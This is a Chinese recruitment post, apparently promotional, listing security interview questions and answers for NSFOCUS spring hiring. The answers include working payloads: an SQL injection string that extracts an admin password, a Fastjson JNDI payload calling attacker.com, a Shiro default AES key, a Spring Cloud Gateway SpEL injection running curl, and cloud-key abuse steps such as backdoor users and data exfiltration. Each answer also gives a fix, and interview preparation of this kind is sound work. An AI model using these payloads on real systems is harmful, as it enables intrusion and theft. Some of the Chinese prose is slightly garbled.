绿盟的春招题都这么难了？

这几天绿盟全国已经开始了25年春招的阵地，全国陆陆续续放出上千个阵地，但群里的小队员大部分表示除了阵地时没问题的，但能听得到不能留下来表现。

看表现看表现，这里不用多说吧，老司机应该都懂吧。

不过绿盟作为老牌网络安全公司，且早年有网安黄埔军校的民间传说。公司整体技术还是不错的，如果大家能拿到机会也还是可以去冲一下的。同事我也把群里大家说问到的面试题整理了一部分在星球上，需要的自取。

绿盟简历投递的地址（海量招聘信息表已更新到星球，自取）

问题1：某登录系统存在SQL注入漏洞，但过滤了'、、和"关键字，如何绕过并获取管理员密码？

答案：空格union

• 绕行引入：使用十六进制编码（0x61646D696E替代'admin'）或宽字节注入（%bf%27）；
• 绕过空格：用/**/或%0a代替；
• 绕过union：使用盲注（布尔/时间盲注）或报错注入（extractvalue(1,concat(0x7e,(select user())))）；
• 利用示例：admin'^extractvalue(1,concat(0x7e,(select substr(password,1,20) from users where username=0x61646D696E)))%23
  修复方案：预编译（PreparedStatement）+白名单过滤。

题目2：在GitHub公开代码中发现某云厂商的AK/SK，如何快速验证并扩大攻击面？
答案：

1. 验证AK/SK有效性：使用AWS CLI执行aws sts get-caller-identity（或对应云厂商SDK）；
2. 权限枚举：分级IAM权限边界、S3存储桶、EC2实例等；
3. 横向移动：创建后门用户、生成临时指令、部署恶意Lambda函数；
4. 数据泄露：下载敏感存储存储数据或数据库快照。
   修复方案：使用环境变量存储密钥、启用密钥交换、限制IAM权限范围。

问题3：如何利用Fastjson ≤1.2.24的反序列化漏洞实现RCE？给出利用链及限制条件。
答案：

• 利用链：JdbcRowSetImpl+ JNDI注入（需出网）；
• 载荷：

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}

• 限制条件：目标需开启autoType功能（默认关闭）；
• 修复方案：升级至1.2.83+，关闭autoType，使用安全模式。

问题4：如何利用Shiro的RememberMe功能实现反序列化攻击？给出关键步骤。
答案：

1. 获取Cookie中的rememberMe字段（Base64+AES-CBC加密）；
2. 利用已知Key（默认Key如kPH+bIxk5D2deZiIxcaaaA==）或爆破Key；
3. 构造恶意序列化数据（如CommonsCollections链），加密后替换Cookie；
4. 触发反序列化实现RCE。
   修复方案：更换Shiro Key，升级至1.7.0+，取消危险链。

题目5：简述CVE-2022-22947的利用条件及攻击步骤。
答案：

• 漏洞成因：未验证路由配置的Filter参数，导致SpEL表达式注入；
• 由于步骤：

1. 添加恶意路由：POST /actuator/gateway/routes/test，Body包含SpEL表达式（如T(java.lang.Runtime).getRuntime().exec("curl attacker.com")）；
2. 刷新路由：POST /actuator/gateway/refresh；
3. 访问路由触发RCE。
   修复方案：升级Spring Cloud Gateway至3.1.1+，取消Actuator接口。

题目6：审计以下代码，指出漏洞并说明利用方式：

String cmd = request.getParameter("cmd");
Runtime.getRuntime().exec(cmd);

答案：

• 漏洞：未过滤直接执行用户输入的cmd参数，导致命令注入；
• 绕过技巧：使用;、&、|、$(subshell)分割命令；
• 修复方案：使用白名单校验或ProcessBuilder参数化调用。